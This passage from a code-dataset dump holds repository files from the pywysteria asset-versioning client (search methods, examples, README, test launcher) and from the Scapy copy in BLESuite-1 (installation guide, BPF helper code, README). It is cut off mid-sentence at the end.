offset\n\n Returns:\n []domain.Item\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(self._conn.find_items, limit, offset)\n\n def find_versions(self, limit:int =DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching versions\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Version\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(self._conn.find_versions, limit, offset)\n\n def find_resources(self, limit:int =DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching resources\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Resource\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(self._conn.find_resources, limit, offset)\n\n def find_links(self, limit:int =DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching links\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Link\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(self._conn.find_links, limit, offset)\n" }, { "alpha_fraction": 0.601123571395874, "alphanum_fraction": 0.6048688888549805, "avg_line_length": 22.217391967773438, "blob_id": "8df5feb595c0627a7ab46254d73368e1380dd563", "content_id": "1d38df9e5920a38c11934f96f80fcb88165d200e", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "permissive", "max_line_length": 80, "num_lines": 23, "path": "/examples/07/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample07: Search everything\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n search = client.search()\n search.params()\n\n # Although generally not good practice, we don't have to give query args\n # Most likely one should use pagination here!\n # Also note, the server does hard limit the number of results returned\n # by such 'match all' queries ..\n for c in search.find_collections():\n print(c)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6520775556564331, "alphanum_fraction": 0.6664819717407227, "avg_line_length": 23.72602653503418, "blob_id": "b78d3bd49a5ca1f8f01c599c8fa8b83c678e70af", "content_id": "b91bd4c1863a45a2ebbdbfa502ff6f57163e1e86", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1805, "license_type": "permissive", "max_line_length": 119, "num_lines": 73, "path": "/README.md", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "# pywysteria\n\nPython3 client for open source asset versioning and publishing system [wysteria](https://github.com/voidshard/wysteria)\n\n\n### Basic Usage\n##### Creating, publishing, linking\n```python\n\nimport wysteria\n\n# connect\nclient = wysteria.Client()\n \nwith client:\n # create collection named \"tiles\" \n tiles = client.create_collection(\"tiles\")\n \n # create sub item for an oak tree\n oak = tiles.create_item(\"tree\", \"oak\")\n \n # create the next version (#1)\n oak01 = oak.create_version()\n\n # add some resources to our new version\n oak01.add_resource(\"default\", \"png\", \"url://images/oak01.png\")\n oak01.add_resource(\"stats\", \"xml\", \"/path/to/file.xml\")\n\n # create a pine item, version & resource\n pine = tiles.create_item(\"tree\", \"pine\")\n pine01 = pine.create_version({\"foo\": \"bar\"})\n pine01.add_resource(\"default\", \"png\", \"/path/to/pine01.png\")\n\n # mark these as published\n oak01.publish()\n pine01.publish()\n\n # create the next \n oas02 = oak.create_version()\n \n # link our tree versions to each other\n oak01.link_to(\"foobar\", pine01)\n``` \n\n##### Searching\n```python\nimport wysteria\n\n# connect\nclient = wysteria.Client()\n \nwith client:\n # create new search object\n search = client.search()\n\n # set some params to search for\n search.params(item_type=\"tree\", item_variant=\"oak\")\n\n # find any & all matching items\n print(\"Items of type 'tree' and variant 'oak'\")\n items = search.find_items()\n```\n\nFor more & more complicated examples please see the examples folder. \n\nMore information available over on the main repo for [wysteria](https://github.com/voidshard/wysteria)\n\n\n\n#### Requires\n\n- Nats client: https://github.com/nats-io/asyncio-nats\n- Config file parser: https://pypi.python.org/pypi/configparser\n" }, { "alpha_fraction": 0.6071133017539978, "alphanum_fraction": 0.6129032373428345, "avg_line_length": 19.491525650024414, "blob_id": "4854ce6211cf2df444bea99687702a8c05a366e2", "content_id": "a755c9171206d7af6f633abec0a8e1808f8b9b78", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1209, "license_type": "permissive", "max_line_length": 94, "num_lines": 59, "path": "/tests/integration/run.sh", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#\n# Integration test suite launcher.\n#\n# You'll want to make sure you build the appropriate docker images first (build scripts are in\n# the main Go repo) wysteria/docker/images/\n#\n# These tests explicitly check network functions & compatibility with the server build(s).\n#\n\n# set fail on error\nset -eu\n\n\n# ------------------ globals\nDIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\nSLEEP_TIME=2\nPYTHON=python3.6\nTEST_DIR=${DIR}\"/tests\"\nPY_DIR=${DIR}\"/../../\"\n# ------------------\n\n\n# add local wysteria python lib to the python path\nexport PYTHONPATH=${PY_DIR}:${PYTHONPATH}\n\n# ------------------ functions\ndotest () {\n # Args:\n # (1) service to launch (as defined in docker-compose)\n\n echo \"> running test:\" $1\n\n docker-compose up -d $1\n\n # sleep for a bit to allow things to start up\n sleep ${SLEEP_TIME}\n\n # permit failures\n set +e\n\n # throw it over to pytest\n ${PYTHON} -m pytest ${TEST_DIR} -vvs\n\n # set fail on error\n set -eu\n\n docker-compose down\n}\n# ------------------\n\n\n# ------------------ start\nexport WYSTERIA_CLIENT_INI=test-nats.ini\ndotest \"local_wysteria_nats\"\n\nexport WYSTERIA_CLIENT_INI=test-grpc.ini\ndotest \"local_wysteria_grpc\"\n" }, { "alpha_fraction": 0.5089722871780396, "alphanum_fraction": 0.5375204086303711, "avg_line_length": 23.039215087890625, "blob_id": "e794d0fad56abb580f8179cd0cb2c0543969161a", "content_id": "6e66ce6a382bae5aa08ab8638a9e919919be673f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1226, "license_type": "permissive", "max_line_length": 55, "num_lines": 51, "path": "/examples/01/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample01: Creating, publishing & linking\n (Created objects here are used in following examples)\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n tiles = client.create_collection(\"tiles\")\n oak = tiles.create_item(\"tree\", \"oak\")\n oak01 = oak.create_version()\n\n oak01.add_resource(\n \"default\", \"png\", \"url://images/oak01.png\"\n )\n oak01.add_resource(\n \"stats\", \"xml\", \"/path/to/file.xml\"\n )\n\n pine = tiles.create_item(\"tree\", \"pine\")\n pine01 = pine.create_version({\"foo\": \"bar\"})\n pine01.add_resource(\n \"default\", \"png\", \"/path/to/pine01.png\"\n )\n\n maps = client.create_collection(\"maps\")\n forest = maps.create_item(\"2dmap\", \"forest\")\n forest01 = forest.create_version()\n\n oak01.publish()\n pine01.publish()\n\n forest01.link_to(\"input\", oak01)\n forest01.link_to(\"input\", pine01)\n\n print(\"--collections\")\n print(forest)\n print(tiles)\n print(\"--items--\")\n print(oak)\n print(pine)\n print(\"--versions--\")\n print(oak01)\n print(pine01)\n\n\nif __name__ == \"__main__\":\n main()\n" } ]
37
jreynders/BLESuite-1
https://github.com/jreynders/BLESuite-1
758404823c71fb15ff8326a5611aed742065bda4
8335d47d76919b79f00cea72a1e58524f3440826
8191c12eb7ebd4296b4e5d35e7de9b53bc767a5a
refs/heads/master
2023-02-20T22:21:35.891269
2022-11-08T22:09:06
2022-11-08T22:09:06
168,422,668
0
0
MIT
2019-01-30T22:04:54
2022-11-08T22:09:15
2023-02-08T20:01:17
Python
[ { "alpha_fraction": 0.6896284818649292, "alphanum_fraction": 0.7016898989677429, "avg_line_length": 34.39725875854492, "blob_id": "f7b82c74df10fe30c86c8d2cda6a689ffc8c9d56", "content_id": "91e72800c6aab0525870644f915aaa153d800cb9", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 15504, "license_type": "permissive", "max_line_length": 410, "num_lines": 438, "path": "/scapy/doc/scapy/installation.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": ".. highlight:: sh\n\n*************************\nDownload and Installation\n*************************\n\nOverview\n========\n\n 0. Install `Python 2.7.X or 3.4+ <https://www.python.org/downloads/>`_.\n 1. `Download and install Scapy. <#installing-scapy-v2-x>`_\n 2. `Follow the platform-specific instructions (depedencies) <#platform-specific-instructions>`_.\n 3. (Optional): `Install additional software for special features <#optional-software-for-special-features>`_.\n 4. Run Scapy with root privileges.\n \nEach of these steps can be done in a different way depending on your platform and on the version of Scapy you want to use. \n\nAt the moment, there are two different versions of Scapy:\n\n* **Scapy v2.x**. The current up-to-date version. It consists of several files packaged in the standard distutils way.\n Scapy v2 <= 2.3.3 needs Python 2.5, Scapy v2 > 2.3.3 needs Python 2.7 or 3.4+.\n* **Scapy v1.x (deprecated)**. It does not support Python 3. It consists of only one file and works on Python 2.4, so it might be easier to install.\n Moreover, your OS may already have specially prepared packages or ports for it. The last version is v1.2.2.\n\n.. note::\n\n In Scapy v2 use ``from scapy.all import *`` instead of ``from scapy import *``.\n\n\nInstalling Scapy v2.x\n=====================\n\nThe following steps describe how to install (or update) Scapy itself.\nDependent on your platform, some additional libraries might have to be installed to make it actually work. \nSo please also have a look at the platform specific chapters on how to install those requirements.\n\n.. note::\n\n The following steps apply to Unix-like operating systems (Linux, BSD, Mac OS X). \n For Windows, see the `special chapter <#windows>`_ below.\n\nMake sure you have Python installed before you go on.\n\nLatest release\n--------------\n\n.. note::\n To get the latest versions, with bugfixes and new features, but maybe not as stable, see the `development version <#current-development-version>`_.\n\nUse pip::\n\n$ pip install scapy\n\n\nYou can also download the `latest version <https://github.com/secdev/scapy/archive/master.zip>`_ to a temporary directory and install it in the standard `distutils <http://docs.python.org/inst/inst.html>`_ way::\n\n$ cd /tmp\n$ wget --trust-server-names https://github.com/secdev/scapy/archive/master.zip # or wget -O master.zip https://github.com/secdev/scapy/archive/master.zip\n$ unzip master.zip\n$ cd master\n$ sudo python setup.py install\n \nCurrent development version\n----------------------------\n\n.. index::\n single: Git, repository\n\nIf you always want the latest version with all new features and bugfixes, use Scapy's Git repository:\n\n1. Install the Git version control system. For example, on Debian/Ubuntu use::\n\n $ sudo apt-get install git\n\n or on OpenBSD:: \n \n $ doas pkg_add git\n\n2. Check out a clone of Scapy's repository::\n \n $ git clone https://github.com/secdev/scapy\n \n3. Install Scapy in the standard distutils way:: \n \n $ cd scapy\n $ sudo python setup.py install\n \nThen you can always update to the latest version::\n\n $ git pull\n $ sudo python setup.py install\n\n.. note::\n\n You can run scapy without installing it using the ``run_scapy`` (unix) or ``run_scapy.bat`` (Windows) script or running it directly from the executable zip file (see the previous section).\n\nInstalling Scapy v1.2 (Deprecated)\n==================================\n\nAs Scapy v1 consists only of one single Python file, installation is easy:\nJust download the last version and run it with your Python interpreter::\n\n $ wget https://raw.githubusercontent.com/secdev/scapy/v1.2.0.2/scapy.py\n $ sudo python scapy.py\n\nOptional software for special features\n======================================\n\nFor some special features, you have to install more software. \nMost of those software are installable via ``pip``.\nHere are the topics involved and some examples that you can use to try if your installation was successful.\n\n.. index::\n single: plot()\n\n* Plotting. ``plot()`` needs `Matplotlib <https://matplotlib.org/>`_. It is installable via ``pip install matplotlib``\n \n .. code-block:: python\n \n >>> p=sniff(count=50)\n >>> p.plot(lambda x:len(x))\n \n* 2D graphics. ``psdump()`` and ``pdfdump()`` need `PyX <http://pyx.sourceforge.net/>`_ which in turn needs a LaTeX distribution: `texlive (Unix) <http://www.tug.org/texlive/>`_ or `MikTex (Windows) <https://miktex.org/>`_.\n \n Note: PyX requires version 0.12.1 on Python 2.7. This means that on Python 2.7, it needs to be installed via ``pip install pyx==0.12.1``. Otherwise ``pip install pyx``\n \n .. code-block:: python\n \n >>> p=IP()/ICMP()\n >>> p.pdfdump(\"test.pdf\") \n \n* Graphs. ``conversations()`` needs `Graphviz <http://www.graphviz.org/>`_ and `ImageMagick <http://www.imagemagick.org/>`_.\n \n .. code-block:: python\n\n >>> p=readpcap(\"myfile.pcap\")\n >>> p.conversations(type=\"jpg\", target=\"> test.jpg\")\n \n* 3D graphics. ``trace3D()`` needs `VPython <http://www.vpython.org/>`_.\n \n .. code-block:: python\n\n >>> a,u=traceroute([\"www.python.org\", \"google.com\",\"slashdot.org\"])\n >>> a.trace3D()\n\n.. index::\n single: WEP, unwep()\n\n* WEP decryption. ``unwep()`` needs `cryptography <https://cryptography.io>`_. Example using a `Weplap test file <http://weplab.sourceforge.net/caps/weplab-64bit-AA-managed.pcap>`_:\n\n Cryptography is installable via ``pip install cryptography``\n\n .. code-block:: python\n\n >>> enc=rdpcap(\"weplab-64bit-AA-managed.pcap\")\n >>> enc.show()\n >>> enc[0]\n >>> conf.wepkey=\"AA\\x00\\x00\\x00\"\n >>> dec=Dot11PacketList(enc).toEthernet()\n >>> dec.show()\n >>> dec[0]\n \n* PKI operations and TLS decryption. `cryptography <https://cryptography.io>`_ is also needed.\n\n* Fingerprinting. ``nmap_fp()`` needs `Nmap <http://nmap.org>`_. You need an `old version <http://nmap.org/dist-old/>`_ (before v4.23) that still supports first generation fingerprinting.\n\n .. code-block:: python \n \n >>> load_module(\"nmap\")\n >>> nmap_fp(\"192.168.0.1\")\n Begin emission:\n Finished to send 8 packets.\n Received 19 packets, got 4 answers, remaining 4 packets\n (0.88749999999999996, ['Draytek Vigor 2000 ISDN router'])\n\n* Queso is used withing the queso module: `queso-980922.tar.gz <http://www.packetstormsecurity.org/UNIX/scanners/queso-980922.tar.gz>`_. Extract the tar.gz file (e.g. using `7-Zip <http://www.7-zip.org/>`_) and put ``queso.conf`` into your Scapy directory\n\n.. index::\n single: VOIP\n \n* VOIP. ``voip_play()`` needs `SoX <http://sox.sourceforge.net/>`_.\n\nPlatform-specific instructions\n==============================\n\nLinux native\n------------\n\nScapy can run natively on Linux, without libdnet and libpcap.\n\n* Install `Python 2.7 or 3.4+ <http://www.python.org>`_.\n* Install `tcpdump <http://www.tcpdump.org>`_ and make sure it is in the $PATH. (It's only used to compile BPF filters (``-ddd option``))\n* Make sure your kernel has Packet sockets selected (``CONFIG_PACKET``)\n* If your kernel is < 2.6, make sure that Socket filtering is selected ``CONFIG_FILTER``) \n\nDebian/Ubuntu\n-------------\n\nJust use the standard packages::\n\n$ sudo apt-get install tcpdump graphviz imagemagick python-gnuplot python-cryptography python-pyx\n\nScapy optionally uses python-cryptography v1.7 or later. It has not been packaged for ``apt`` in less recent OS versions (e.g. Debian Jessie). If you need the cryptography-related methods, you may install the library with:\n\n.. code-block:: text\n\n # pip install cryptography\n\nFedora\n------\n\nHere's how to install Scapy on Fedora 9:\n\n.. code-block:: text\n\n # yum install git python-devel\n # cd /tmp\n # git clone https://github.com/secdev/scapy\n # cd scapy\n # python setup.py install\n \nSome optional packages:\n\n.. code-block:: text\n\n # yum install graphviz python-cryptography sox PyX gnuplot numpy\n # cd /tmp\n # wget http://heanet.dl.sourceforge.net/sourceforge/gnuplot-py/gnuplot-py-1.8.tar.gz\n # tar xvfz gnuplot-py-1.8.tar.gz\n # cd gnuplot-py-1.8\n # python setup.py install\n\n\nMac OS X\n--------\n\nOn Mac OS X, Scapy does not work natively. You need to install Python bindings\nto use libdnet and libpcap. You can choose to install using either Homebrew or\nMacPorts. They both work fine, yet Homebrew is used to run unit tests with\n`Travis CI <https://travis-ci.org>`_. \n\n\nInstall using Homebrew\n^^^^^^^^^^^^^^^^^^^^^^\n\n1. Update Homebrew::\n\n $ brew update\n\n2. Install Python bindings::\n\n\n $ brew install --with-python libdnet\n $ brew install https://raw.githubusercontent.com/secdev/scapy/master/.travis/pylibpcap.rb\n $ sudo brew install --with-python libdnet\n $ sudo brew install https://raw.githubusercontent.com/secdev/scapy/master/.travis/pylibpcap.rb\n\n\nInstall using MacPorts\n^^^^^^^^^^^^^^^^^^^^^^\n\n1. Update MacPorts::\n\n $ sudo port -d selfupdate\n\n2. Install Python bindings::\n\n $ sudo port install py-libdnet py-pylibpcap\n\n\nOpenBSD\n-------\n\nHere's how to install Scapy on OpenBSD 5.9+\n\n.. code-block:: text\n\n $ doas pkg_add py-libpcap py-libdnet git\n $ cd /tmp\n $ git clone http://github.com/secdev/scapy\n $ cd scapy\n $ doas python2.7 setup.py install\n\n\nOptional packages (OpenBSD only)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\npy-cryptography\n\n.. code-block:: text\n\n # pkg_add py-cryptography\n\ngnuplot and its Python binding: \n\n.. code-block:: text\n\n # pkg_add gnuplot py-gnuplot\n\nGraphviz (large download, will install several GNOME libraries)\n\n.. code-block:: text\n\n # pkg_add graphviz\n\n \nImageMagick (takes long to compile)\n\n.. code-block:: text\n\n # cd /tmp\n # ftp ftp://ftp.openbsd.org/pub/OpenBSD/4.3/ports.tar.gz \n # cd /usr\n # tar xvfz /tmp/ports.tar.gz \n # cd /usr/ports/graphics/ImageMagick/\n # make install\n\nPyX (very large download, will install texlive etc.)\n\n.. code-block:: text\n\n # pkg_add py-pyx\n\n/etc/ethertypes\n\n.. code-block:: text\n\n # wget http://git.netfilter.org/ebtables/plain/ethertypes -O /etc/ethertypes\n\npython-bz2 (for UTscapy)\n\n.. code-block:: text\n\n # pkg_add python-bz2 \n\n.. _windows_installation:\n\nWindows\n-------\n\n.. sectionauthor:: Dirk Loss <mail at dirk-loss.de>\n\nScapy is primarily being developed for Unix-like systems and works best on those platforms. But the latest version of Scapy supports Windows out-of-the-box. So you can use nearly all of Scapy's features on your Windows machine as well.\n\n.. note::\n If you update from Scapy-win v1.2.0.2 to Scapy v2 remember to use ``from scapy.all import *`` instead of ``from scapy import *``.\n\n.. image:: graphics/scapy-win-screenshot1.png\n :scale: 80\n :align: center\n\nYou need the following software packages in order to install Scapy on Windows:\n\n * `Python <http://www.python.org>`_: `Python 2.7.X or 3.4+ <https://www.python.org/downloads/>`_. After installation, add the Python installation directory and its \\Scripts subdirectory to your PATH. Depending on your Python version, the defaults would be ``C:\\Python27`` and ``C:\\Python27\\Scripts`` respectively.\n * `Npcap <https://nmap.org/npcap/>`_: `the latest version <https://nmap.org/npcap/#download>`_. Default values are recommanded. Scapy will also work with Winpcap.\n * `Scapy <http://www.secdev.org/projects/scapy/>`_: `latest development version <https://github.com/secdev/scapy/archive/master.zip>`_ from the `Git repository <https://github.com/secdev/scapy>`_. Unzip the archive, open a command prompt in that directory and run \"python setup.py install\". \n\nJust download the files and run the setup program. Choosing the default installation options should be safe.\n\nFor your convenience direct links are given to the version that is supported (Python 2.7 and 3.4+). If these links do not work or if you are using a different Python version (which will surely not work), just visit the homepage of the respective package and look for a Windows binary. As a last resort, search the web for the filename.\n\nAfter all packages are installed, open a command prompt (cmd.exe) and run Scapy by typing ``scapy``. If you have set the PATH correctly, this will find a little batch file in your ``C:\\Python27\\Scripts`` directory and instruct the Python interpreter to load Scapy.\n\nIf really nothing seems to work, consider skipping the Windows version and using Scapy from a Linux Live CD -- either in a virtual machine on your Windows host or by booting from CDROM: An older version of Scapy is already included in grml and BackTrack for example. While using the Live CD you can easily upgrade to the latest Scapy version by using the `above installation methods <#installing-scapy-v2-x>`_.\n\nScreenshot\n^^^^^^^^^^\n\n.. image:: graphics/scapy-win-screenshot2.png\n :scale: 80\n :align: center\n\nKnown bugs\n^^^^^^^^^^\n\n * You may not be able to capture WLAN traffic on Windows. Reasons are explained on the Wireshark wiki and in the WinPcap FAQ. Try switching off promiscuous mode with ``conf.sniff_promisc=False``.\n * Packets sometimes cannot be sent to localhost (or local IP addresses on your own host).\n \nWinpcap/Npcap conflicts\n^^^^^^^^^^^^^^^^^^^^^^^\n\nAs Winpcap is becoming old, it's recommended to use Npcap instead. Npcap is part of the Nmap project.\n\n1. If you get the message 'Winpcap is installed over Npcap.' it means that you have installed both winpcap and npcap versions, which isn't recommended.\n\nYou may **uninstall winpcap from your Program Files**, then you will need to remove:\n * C:/Windows/System32/wpcap.dll\n * C:/Windows/System32/Packet.dll\nAnd if you are on an x64 machine:\n * C:/Windows/SysWOW64/wpcap.dll\n * C:/Windows/SysWOW64/Packet.dll\n\nTo use npcap instead. Those files are not removed by the Winpcap un-installer.\n\n2. If you get the message 'The installed Windump version does not work with Npcap' it surely means that you have installed an old version of Windump.\nDownload the correct one on https://github.com/hsluoyz/WinDump/releases\n\nIn some cases, it could also mean that you had installed Npcap and Winpcap, and that Windump is using Winpcap. Fully delete Winpcap using the above method to solve the problem.\n\nBuild the documentation offline\n===============================\nThe Scapy project's documentation is written using reStructuredText (files \\*.rst) and can be built using\nthe `Sphinx <http://www.sphinx-doc.org/>`_ python library. The official online version is available\non `readthedocs <http://scapy.readthedocs.io/>`_.\n\nHTML version\n------------\nThe instructions to build the HTML version are: ::\n\n (activate a virtualenv)\n pip install sphinx\n cd doc/scapy\n make html\n\nYou can now open the resulting HTML file ``_build/html/index.html`` in your favorite web browser.\n\nTo use the ReadTheDocs' template, you will have to install the corresponding theme with: ::\n\n pip install sphinx_rtd_theme\n\nUML diagram\n-----------\nUsing ``pyreverse`` you can build a UML representation of the Scapy source code's object hierarchy. Here is an\nexample of how to build the inheritance graph for the Fields objects : ::\n\n (activate a virtualenv)\n pip install pylint\n cd scapy/\n pyreverse -o png -p fields scapy/fields.py\n\nThis will generate a ``classes_fields.png`` picture containing the inheritance hierarchy. Note that you can provide as many\nmodules or packages as you want, but the result will quickly get unreadable.\n\nTo see the dependencies between the DHCP layer and the ansmachine module, you can run: ::\n\n pyreverse -o png -p dhcp_ans scapy/ansmachine.py scapy/layers/dhcp.py scapy/packet.py\n\nIn this case, Pyreverse will also generate a ``packages_dhcp_ans.png`` showing the link between the different python modules provided.\n" }, { "alpha_fraction": 0.5867614150047302, "alphanum_fraction": 0.6058339476585388, "avg_line_length": 27.147367477416992, "blob_id": "5ec947f3b2cd52766ddc26fa5b4a393a6b8a293b", "content_id": "b7be99230724966f0a6b91639bbe6bffc2efb44a", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2674, "license_type": "permissive", "max_line_length": 84, "num_lines": 95, "path": "/scapy/scapy/arch/common.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Philippe Biondi <phil@secdev.org>\n# This program is published under a GPLv2 license\n\n\"\"\"\nFunctions common to different architectures\n\"\"\"\n\nimport socket\nfrom fcntl import ioctl\nimport os\nimport struct\nimport ctypes\nfrom ctypes import POINTER, Structure\nfrom ctypes import c_uint, c_uint32, c_ushort, c_ubyte\nfrom scapy.config import conf\nimport scapy.modules.six as six\n\n# UTILS\n\n\ndef get_if(iff, cmd):\n \"\"\"Ease SIOCGIF* ioctl calls\"\"\"\n\n sck = socket.socket()\n ifreq = ioctl(sck, cmd, struct.pack(\"16s16x\", iff.encode(\"utf8\")))\n sck.close()\n return ifreq\n\n# BPF HANDLERS\n\n\nclass bpf_insn(Structure):\n \"\"\"\"The BPF instruction data structure\"\"\"\n _fields_ = [(\"code\", c_ushort),\n (\"jt\", c_ubyte),\n (\"jf\", c_ubyte),\n (\"k\", c_uint32)]\n\n\nclass bpf_program(Structure):\n \"\"\"\"Structure for BIOCSETF\"\"\"\n _fields_ = [(\"bf_len\", c_uint),\n (\"bf_insns\", POINTER(bpf_insn))]\n\n\ndef _legacy_bpf_pointer(tcpdump_lines):\n \"\"\"Get old-format BPF Pointer. Deprecated\"\"\"\n X86_64 = os.uname()[4] in ['x86_64', 'aarch64']\n size = int(tcpdump_lines[0])\n bpf = b\"\"\n for l in tcpdump_lines[1:]:\n if six.PY2:\n int_type = long # noqa: F821\n else:\n int_type = int\n bpf += struct.pack(\"HBBI\", *map(int_type, l.split()))\n\n # Thanks to http://www.netprojects.de/scapy-with-pypy-solved/ for the pypy trick\n if conf.use_pypy:\n str_buffer = ctypes.create_string_buffer(bpf)\n return struct.pack('HL', size, ctypes.addressof(str_buffer))\n else:\n # XXX. Argl! We need to give the kernel a pointer on the BPF,\n # Python object header seems to be 20 bytes. 36 bytes for x86 64bits arch.\n if X86_64:\n return struct.pack(\"HL\", size, id(bpf) + 36)\n else:\n return struct.pack(\"HI\", size, id(bpf) + 20)\n\n\ndef get_bpf_pointer(tcpdump_lines):\n \"\"\"Create a BPF Pointer for TCPDump filter\"\"\"\n if conf.use_pypy:\n return _legacy_bpf_pointer(tcpdump_lines)\n\n # Allocate BPF instructions\n size = int(tcpdump_lines[0])\n bpf_insn_a = bpf_insn * size\n bip = bpf_insn_a()\n\n # Fill the BPF instruction structures with the byte code\n tcpdump_lines = tcpdump_lines[1:]\n i = 0\n for line in tcpdump_lines:\n values = [int(v) for v in line.split()]\n bip[i].code = c_ushort(values[0])\n bip[i].jt = c_ubyte(values[1])\n bip[i].jf = c_ubyte(values[2])\n bip[i].k = c_uint(values[3])\n i += 1\n\n # Create the BPF program\n return bpf_program(size, bip)\n" }, { "alpha_fraction": 0.7306009531021118, "alphanum_fraction": 0.7455675601959229, "avg_line_length": 36.43965530395508, "blob_id": "54349fb6c7db2c07108105c10a3028568254b5fa", "content_id": "fb1738b249a3cf6f838fb2d0828c2f4f6545442e", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4343, "license_type": "permissive", "max_line_length": 201, "num_lines": 116, "path": "/scapy/README.md", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n <img src=\"doc/scapy_logo.png\" width=200>\n</p>\n\n# Scapy #\n\n[![Travis Build Status](https://travis-ci.org/secdev/scapy.svg?branch=master)](https://travis-ci.org/secdev/scapy)\n[![AppVeyor Build Status](https://ci.appveyor.com/api/projects/status/github/secdev/scapy?svg=true)](https://ci.appveyor.com/project/secdev/scapy)\n[![Codecov Status](https://codecov.io/gh/secdev/scapy/branch/master/graph/badge.svg)](https://codecov.io/gh/secdev/scapy)\n[![PyPI Version](https://img.shields.io/pypi/v/scapy.svg)](https://pypi.python.org/pypi/scapy/)\n[![Python Versions](https://img.shields.io/pypi/pyversions/scapy.svg)](https://pypi.python.org/pypi/scapy/)\n[![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](LICENSE)\n[![Join the chat at https://gitter.im/secdev/scapy](https://badges.gitter.im/secdev/scapy.svg)](https://gitter.im/secdev/scapy?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n\nScapy is a powerful Python-based interactive packet manipulation program and\nlibrary.\n\nIt is able to forge or decode packets of a wide number of protocols, send them\non the wire, capture them, store or read them using pcap files, match requests\nand replies, and much more. It is designed to allow fast packet prototyping by\nusing default values that work.\n\nIt can easily handle most classical tasks like scanning, tracerouting, probing,\nunit tests, attacks or network discovery (it can replace `hping`, 85% of `nmap`,\n`arpspoof`, `arp-sk`, `arping`, `tcpdump`, `wireshark`, `p0f`, etc.). It also\nperforms very well at a lot of other specific tasks that most other tools can't\nhandle, like sending invalid frames, injecting your own 802.11 frames, combining\ntechniques (VLAN hopping+ARP cache poisoning, VoIP decoding on WEP protected\nchannel, ...), etc.\n\nScapy supports Python 2.7 and Python 3 (3.4 to 3.6). It's intended to\nbe cross platform, and runs on many different platforms (Linux, OSX,\n*BSD, and Windows).\n\n## Hands-on ##\n\n### Interactive shell ###\n\nScapy can easily be used as an interactive shell to interact with the network.\nThe following example shows how to send an ICMP Echo Request message to\n`github.com`, then display the reply source IP address:\n\n```python\nsudo ./run_scapy \nWelcome to Scapy\n>>> p = IP(dst=\"github.com\")/ICMP()\n>>> r = sr1(p)\nBegin emission:\n.Finished to send 1 packets.\n*\nReceived 2 packets, got 1 answers, remaining 0 packets\n>>> r[IP].src\n'192.30.253.113'\n```\n\n### Python module ###\n\nIt is straightforward to use Scapy as a regular Python module, for example to\ncheck if a TCP port is opened. First, save the following code in a file names\n`send_tcp_syn.py`\n\n```python\nfrom scapy.all import *\nconf.verb = 0\n\np = IP(dst=\"github.com\")/TCP()\nr = sr1(p)\nprint(r.summary())\n```\n\nThen, launch the script with:\n```python\nsudo python send_tcp_syn.py\nIP / TCP 192.30.253.113:http > 192.168.46.10:ftp_data SA / Padding\n```\n\n### Resources ###\n\nTo begin with Scapy, you should check [the notebook\nhands-on](doc/notebooks/Scapy%20in%2015%20minutes.ipynb) and the [interactive\ntutorial](http://scapy.readthedocs.io/en/latest/usage.html#interactive-tutorial).\nIf you want to learn more, see [the quick demo: an interactive\nsession](http://scapy.readthedocs.io/en/latest/introduction.html#quick-demo)\n(some examples may be outdated), or play with the\n[HTTP/2](doc/notebooks/HTTP_2_Tuto.ipynb) and [TLS](doc/notebooks/tls)\nnotebooks.\n\nThe [documentation](http://scapy.readthedocs.io/en/latest/) contains more\nadvanced use cases, and examples.\n\n## Installation ##\n\nScapy works without any external Python modules on Linux and BSD like operating\nsystems. On Windows, you need to install some mandatory dependencies as\ndescribed in [the\ndocumentation](http://scapy.readthedocs.io/en/latest/installation.html#windows).\n\nOn most systems, using Scapy is as simple as running the following 